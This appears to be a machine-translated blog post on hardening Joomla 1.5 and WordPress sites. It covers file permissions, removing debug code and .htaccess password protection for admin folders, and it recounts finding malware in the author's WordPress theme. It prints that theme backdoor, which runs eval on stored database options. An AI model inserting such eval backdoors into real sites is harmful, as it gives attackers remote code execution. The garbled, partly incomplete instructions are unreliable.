  1. Takođe, "stručnjaci" uveravaju da se sajtovi na Joomli 1.5 razbijaju "na jedan ili dva" korišćenjem onog u engine-u (preko njega navodno možete promeniti administratorsku lozinku). Čak i ako ne koristite registraciju na svojoj web stranici i nigdje ne prikazujete link za vraćanje, to ne znači da ste pokrili ovu ranjivost. Samo dodajte sljedeći isječak u URL početne stranice vaše web stranice i dobit ćete funkciju koju tražite: /index.php?option=com_user&view=reset

    Zapravo, da zatvorite ovu rupu (ali još uvijek ne razumijem kako je koristiti za hakiranje), možete jednostavno izbrisati ovaj fajl:

    /components/com_user/models/reset.php Istina, nakon toga niko od korisnika registrovanih na vašem sajtu neće moći da koristi funkciju vraćanja lozinke, ali za mene to nije bilo važno, jer registracija nije obezbeđena.

  2. Također kažu da tako koristan shnyag kao što je dodavanje na adresu stranice također omogućava piscima virusa i lovcima na tuđa dobra da dođu do nekih osjetljivih područja vaše stranice i učine je destruktivnom, ili na neki drugi način da ga zloupotrebe. Ova stvar se ponovo uklanja uređivanjem jedne od datoteka motora. /libraries/Joomla/application/module/helper.php

    Tamo trebate ukloniti dva dijela koda, ili ih prokomentirati tako što ćete ih zatvoriti u /* i */ (ovaj kod neće biti izvršen od strane tumača jezika). Prvi isječak je:

    If(count($result) == 0) ( if(JRequest::getBool("tp")) ( $result = JModuleHelper::getModule("mod_".$position); $result->title = $position; $result->content = $position; $result->position = $position; ) )

    A drugi je:

    If(JRequest::getBool("tp")) ( $attribs["style"] .= " outline"; )

    Zapravo, nakon toga, resetujete keš memoriju i pokušavate da vidite pozicije modula u vašem predlošku koristeći sledeću konstrukciju:

    https://website/?tp=1

    Ako nije išlo, onda ste, nadamo se, zatvorili ovu rupu.

  3. Vrlo često se web lokacije hakuju ne izvana, već iznutra. Trojanci i keylogeni na vašem računaru znaju šta da traže i gde, dakle ne čuvajte lozinke u FTP klijentima(postoji opcija za korištenje u ovom slučaju) Još je bolje onemogućiti mogućnost pristupa vašoj web stranici preko FTP-a, ali umjesto toga, gdje su prenesene informacije (uključujući lozinke) šifrirane, što ih čini beskorisnim presretnutim. Da budem iskren, zanemarujem posljednji savjet zbog svoje „mrače“. Postoji i opcija da konfigurišete pristup vašoj veb lokaciji putem običnog FTP-a samo sa određene IP adrese (vaš računar), ali moj ISP ima dinamički IP (menja se u određenom opsegu).
  4. Također savjetujte motor ne veće od onih koje su stvarno potrebne za njegovo djelovanje. Zapravo, nisam baš razmišljao o tome da ga postavim prema predlošku: 755 za mape i 644 za datoteke. sve je moguće uz pomoć iste Filezille. Štaviše, ova prava se moraju primijeniti ne samo na direktorije korijenskog foldera, već i na sve direktorije i datoteke koji se nalaze unutar njih.

    Postavio sam prava na 444 na fajlove u root folderu, a na 705 na direktorijume tmp i logs. Naravno da bi bilo moguće i jače da ga "pričvrstim", ali nemam puno iskustva u tome, i nije bilo vremena za gubljenje vremena na eksperimente. A osim toga, sve to neće ozbiljno odvratiti hakere, jer postoje stvari koje mogu poništiti sve naše napore. Da biste to učinili, koristite sljedeće naredbe:

    Stoga, kako bi se datoteke Joomla 1.5 engine-a u potpunosti „zabetonirali“ od hakovanja i zadiranja, potrebno je zabraniti promjenu prava pristupa datotekama i mapama putem PHP-a. To se radi u postavkama servera, ali ne znam još kako i gdje. Ako znate, molimo vas da postavite link.

  5. Sve gore navedeno je osmišljeno kako bi se smanjila vjerovatnoća da će vaša web lokacija biti hakovana i probijena školjkama i drugim zlonamjernim softverom. Međutim, poduzete mjere nisu garancija, tako da bi bilo odlično na serveru (gdje živi vaša Joomla 1.5 stranica). Ovo će ukloniti svu negativnost iz procurele zloće. Međutim, lično, opet, ovo još nisam implementirao iz razloga mog „mraka“. Bio bih zahvalan za linkove do materijala koji objašnjavaju ovaj proces.
  6. Vrlo često razbijaju web stranice, dobijajući pristup administrativnoj ploči. Jasno je da je zaštićena lozinkom, stoga se metodom brute sile (pametnog odabira) mnoge, čak i naizgled složene lozinke razbijaju na jednu ili dvije. dakle i administratora treba zaštititi, a bolje je to učiniti ne uz pomoć dodatnih ekstenzija, već uz pomoć servera. Postoji nekoliko opcija zaštite. Na primjer, možete promijeniti URL adresu admin panela na ovaj ili onaj način kako haker ne bi mogao započeti svoj prljavi posao.

    Drugi način zaštite, koji će biti detaljno opisan u nastavku, je stvaranje dodatne barijere na putu uljeza (živa osoba ili skripta). Sastoji se od zaštite direktorija s admin datotekama (u Joomli je to administratorski folder, a u WordPressu - wp-admin) pomoću web servera. Ispostavilo se da ćete prilikom pristupa admin panelu prvo trebati unijeti korisničko ime i lozinku za pristup folderu, a tek onda korisničko ime i lozinku za pristup, zapravo, administratorskoj ploči motora. Štaviše, razbijanjem prve linije odbrane korištenjem brute-force metoda, zlonamjerni softver neće stvoriti nikakvo značajno dodatno opterećenje na serveru, što je dobro.

  7. Još jedna vrlo važna, po mom mišljenju, napomena za povećanje sigurnosti vaših web stranica od hakovanja i zaraze virusima je da slijedite pravilo: jedan sajt - jedan hosting nalog. Da, skuplje je, ali mnogo sigurnije. Kada su postavljene na jedan nalog, sve vaše stranice će odmah biti dostupne putem FTP-a kada zlonamjerni softver dobije pristup samo jednoj od njih. Oni razbijaju web lokacije na mašini i ne bi bilo razumno nadati se da skripte neće ići gore na stablo direktorija. Osim toga, veoma je teško tretirati gomilu sajtova na jednom hosting nalogu, jer se baveći jednim sajtom gubite iz vida već izlečeni, koji je u tom trenutku zaražen.
  8. Usput, mogu se pokvariti ne samo sa vaše vlastite web-lokacije, već i s web-mjesta vašeg susjeda hostinga, ako se vlasnici nisu pravilno pobrinuli da isključe ovu mogućnost. Mogu da hakuju i hosting panel (lajk,), ali u svakom slučaju, broj hakova zbog greške hostera je zanemarljiv u odnosu na broj hakova zbog nepažnje vlasnika sajtova.

Kako zaštititi admin područje vaše stranice od hakovanja?

Želim da pričam detaljno o načinu zaštite koji sam i sam nedavno koristio. Uključen je u uskraćivanje pristupa fasciklama u kojima se nalaze fajlovi administrativnog panela sajta. Zabrana se postavlja pomoću divne .htaccess datoteke, koja vam, u stvari, omogućava daljinsku kontrolu postavki web servera na kojem je vaša stranica instalirana. Istovremeno, zna kako to učiniti selektivno.

Sve direktive napisane u .htaccess će se primjenjivati ​​samo na direktorij u kojem se nalazi. Želite li promijeniti nešto u postavkama za cijelu stranicu? Zatim stavite .htaccess u root folder. Pa, zanimaju nas postavke koje se odnose samo na folder sa fajlovima admin panela, pa ćemo ga staviti tamo. U Joomli to će biti administratorski folder, u WordPress-u će biti wp-admin.

Međutim, jedan .htaccess nam nije dovoljan. Također ćete morati koristiti .htpasswd, gdje će biti pohranjeni login i lozinka za pristup ovom administrativnom folderu. Štaviše, lozinka će biti pohranjena ne u otvorenom obliku, već u obliku MD5 šifre. Neće raditi povrat lozinke pomoću nje, ali kada unesete ispravnu kombinaciju u polje za lozinku, web server će izračunati iznos MD5 za ovu kombinaciju i uporediti ga sa onim što je pohranjeno u .htpasswd. Ako se podaci poklapaju, tada će vam biti dozvoljen pristup Joomla ili WordPress admin području, a ako ne, onda im neće biti dozvoljen ulazak.

To je sve, ostaje samo da se plan oživi. Morate dodati neke direktive u .htaccess. Znaš šta? Ne znam. Da, i nekako ćete morati da prestignete lozinku u MD5 sekvenci. Problem. Međutim, ima prilično jednostavno rješenje. Ljubazni ljudi su organizovali onlajn servis za generisanje sadržaja za .htaccess fajl i .htpasswd fajl na osnovu logina i lozinke koje ste smislili. Istina, morat ćete navesti i apsolutnu putanju do administrativne mape, ali to su već sitnice.

Dakle, upoznajte - veliko i strašno generator zaštite za admin panel vaše stranice. Razumljivo, zar ne? Smislite, a najbolje od svega, napravite dvije najsloženije kombinacije slova, brojeva i znakova, a zatim ih unesite u gornja dva polja. Samo nemojte zaboraviti da ih zapišete, ili ih ugurate u upravitelj lozinki, inače nećete moći sami ući u admin panel i morat ćete ponovo raditi sve što je opisano u ovom dijelu.

Evo, sada. Znate li ovu? Čak i ako ne znate, ne brinite. Povežite se sa sajtom preko FTP-a, kreirajte fajl sa bilo kojim imenom u korenu (da, čak i sa ovim url_path.php) i dodajte mu ovaj jednostavan kod:

"; echo "Puna putanja do skripte i njeno ime: ".$_SERVER["SCRIPT_FILENAME"]."
"; echo "Naziv skripte: ".$_SERVER["SCRIPT_NAME"]; ?>

Zatim idite na pretraživač i unesite ovaj URL u adresnu traku (naravno sa svojom domenom):

https://website/url_path.php

Kao rezultat toga, vidjet ćete isti apsolutni put koji vas je zanimao. Unesite ga u .htaccess i .htpasswd generator datoteka iznad. Ne zaboravite da na kraju ove putanje dodate ime administratorskog ili wp-admin foldera bez kose crte na kraju. To je to, sada kliknite na dugme "Generiraj".

I zauzvrat prenesite sadržaj za .htaccess i .htpasswd datoteke direktno u te iste datoteke.

Nadam se da ste ih već kreirali u administratorskim ili wp-admin folderima (u zavisnosti od motora koji koristite)?

Pa, sada pokušajte otići na admin panel. Pojavljuje se prozor u kojem se od vas traži da unesete korisničko ime i lozinku sa vašeg web servera? Različito se prikazuje u različitim pretraživačima, ali u Chromeu izgleda ovako:

Ako se nešto ne zalijepi, onda "pušite" apsolutnu putanju do .htpasswd, navedenu u datoteci .htaccess. U ovom slučaju, samo ga ručno ispravite prilikom uređivanja datoteke. To je sve što sam ti htio reći danas. Ako želite nešto izgrditi ili dodati, onda idite.

Virus u WordPressu?

Nakon što sam napisao ovaj članak, otkrio sam zlonamjerni softver na svom blogu (https:// stranica) (ili nešto što je instalirano bez moje volje). Samo sam htio promijeniti nešto u kodu i ušao u . Na samom dnu, neposredno prije oznake Body, pogodio me poziv neke meni nepoznate funkcije (po imenu, ali nisam našao ništa vrijedno):

Čini se da je ime razumno. Zanimljivo, tri nedelje ranije sam slučajno otkrio da imam novu tabelu u bazama podataka dva moja WordPress bloga (https://site i još jedan). Ime joj je bilo divno - wp-config. Ponovno guglanje ovog imena nije dalo ništa vrijedno, jer su se svi odgovori odnosili na istoimeni fajl wp-config.php.

Ova tabela je brzo porasla (do stotine megabajta na https:// sajtu) i u nju su upisane adrese stranica moje stranice sa raznim parametrima. Ne shvatajući suštinu ovog procesa, samo sam srušio ovaj sto i to je to. Inače, imam još jedan blog na WordPress-u, ali tamo ništa slično nije primijećeno.

E, evo nađoh takav "govoreći" umetak u temi. Također sam odlučio da vidim da li je tamo dodano nešto što je u skladu s gore opisanom linijom na dnu podnožja. Ispostavilo se da je to dodato. I tako uredno - ni na samom vrhu, ni na samom dnu, već druga (ili treća) odozgo upisana funkcija:

Funkcija wp_custom_page_links_return() ( $option = get_option("wp_custom_page_links"); @eval($option); ) @eval(get_option("wp_brlinks"));

Ovdje vam upada za oko divni “eval”. Zanimljivo je da je Aibolit (opisan gore) ovaj fragment smatrao sumnjivim, ali ga još nisam dobio, jer ovaj skript već sumnja na mnoge ljude u nepouzdanosti. Guglao sam i po ovom kodu i pronašao objavu (nažalost, sada je ta domena blokirana zbog neplaćanja) sa opisom sličnog problema. Prijatelj je procurio ovu glupost sa novom temom, u koju je ušiven nekakav instalacioni kod.

Imam teme na oba zaražena bloga stoje dugi niz godina. Vjerovatno je postojala neka vrsta ranjivosti u motoru ili, što su zlobnici brzo (na potoku) iskoristili. Općenito, provjerite sami odsustvo takvih uključivanja. Datum promjene opisanih dosijea pao je, po mom mišljenju, na sredinu septembra ove godine.

Savjetujem vam da pogledate i izbor 17 video tutorijala o osiguranju stranica na Joomli. Oni će se automatski igrati jedan za drugim, a ako želite, možete se prebaciti na sljedeću lekciju koristeći odgovarajuće dugme na panelu plejera ili odabrati željenu lekciju iz padajućeg menija u gornjem levom uglu prozora plejera:

Uživajte u gledanju!

Sretno ti! Vidimo se uskoro na stranicama bloga

Možda ste zainteresovani

Joomla stranica je počela da izdaje gomilu grešaka kao što su - Strogi standardi: Nestatička metoda JLoader::import () ne treba se statički pozivati ​​u
Ažurirajte Joomla na najnoviju verziju
Kreiranje mape za Joomla stranicu koristeći Xmap komponentu
Šta je Joomla
Grupe korisnika u Joomli, podešavanja keširanja i problem slanja pošte sa sajta
K2 komponenta za kreiranje blogova, kataloga i portala na Joomli - karakteristike, instalacija i rusifikacija
Moduli u Joomli - prikaz pozicije, konfiguracije i izlaza, kao i dodjela sufiksa klasa
Kako nadograditi statičnu Html stranicu na dinamičku u Joomli
Instalacija WordPress-a u detalje i slike, prijava na WP admin panel i promjena lozinke
Joomla dodaci - TinyMCE, Load Module, Legacy i drugi instalirani po defaultu